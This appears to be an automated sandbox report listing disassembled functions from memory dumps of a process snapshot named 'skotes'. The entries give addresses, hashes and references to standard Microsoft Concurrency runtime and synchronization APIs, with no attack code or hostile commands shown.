Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
String ID: e
API String ID: 1411586358-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 5f640cd7e064a36365839f05e46ced551074e402189fda68349588fb0394684f
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 1C11E735105508EBDB85DE69C8857AA77A8EF02324B24C05AFC079F103DF79D902CB90

Function 0074D029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

___scrt_fastfail.LIBCMT ref: 0074D0A5

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 0074D03B
SleepConditionVariableCS, xrefs: 0074D05D
WakeAllConditionVariable, xrefs: 0074D069
kernel32.dll, xrefs: 0074D04C

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2964418898-3242537097
Opcode ID: 990f6378dc684415d213c0015d4302dfcdf3c6b94b4564ca5d441c90fd5a53c3
Instruction ID: f0755d81b5d44598cc892906869b52b9bc53d8f6b16479375311268e98b821a5
Opcode Fuzzy Hash: 990f6378dc684415d213c0015d4302dfcdf3c6b94b4564ca5d441c90fd5a53c3
Instruction Fuzzy Hash: 8401D6A0BC2B216ABA337BB15C01E6B128CCB82B58F151111BC40E3290EBACDD038679

Function 0075E8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0075E91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0075E926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0075E950
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0075E959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0075E9DC

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
String ID:
API String ID: 512098550-0
Opcode ID: f2e733f33695c7a14bd7b0c3d69945998603548d1fa3fadebc834410a50aaf7b
Instruction ID: 7d14c282dd6a31cb38e644f9f592e05264038028fdd0127752b59b44df29217e
Opcode Fuzzy Hash: f2e733f33695c7a14bd7b0c3d69945998603548d1fa3fadebc834410a50aaf7b
Instruction Fuzzy Hash: B9416035A00219EFCB09DF64C458AADB7B6FF48311F148159E846A7390CBB8BE05CF81

Function 0075D2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0075D344
ListArray.LIBCONCRT ref: 0075D367
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0075D370
ListArray.LIBCONCRT ref: 0075D3A8
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0075D3B3

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
String ID:
API String ID: 4212520697-0
Opcode ID: 111261197cbe264cf00050f4131a9b017f091e9b10b5359822e89120d57cafde
Instruction ID: bf55f0c8a698f86b2f610096f4f578ed7be7fd9699443edba295da472c9dad14
Opcode Fuzzy Hash: 111261197cbe264cf00050f4131a9b017f091e9b10b5359822e89120d57cafde
Instruction Fuzzy Hash: 8331C135700200DFCB25DF54C885BEDB7A5BF88311F144099EC069B392CBB8AC49CB92

Function 007586C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 007586EE

Part of subcall function 0074EAD0: _SpinWait.LIBCONCRT ref: 0074EAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00758702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00758734
List.LIBCMT ref: 007587B7
List.LIBCMT ref: 007587C6

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 51a0b6161bfdfa058cf32a0843394df4a7b27f7a1522712a3908fa691dedd8fa
Instruction ID: 1e02aad112c7f4ac9d86f798c33c18191de3360bb388dc07f83618e630599ba7
Opcode Fuzzy Hash: 51a0b6161bfdfa058cf32a0843394df4a7b27f7a1522712a3908fa691dedd8fa
Instruction Fuzzy Hash: FB31BC32D01255DFCB54EFA4C5856EDB7B1BF08319F28046ED84237252CBB9AD08CB92

Function 0076182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 007618A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 007618EB

Strings

pContext, xrefs: 0076189C

Memory Dump Source

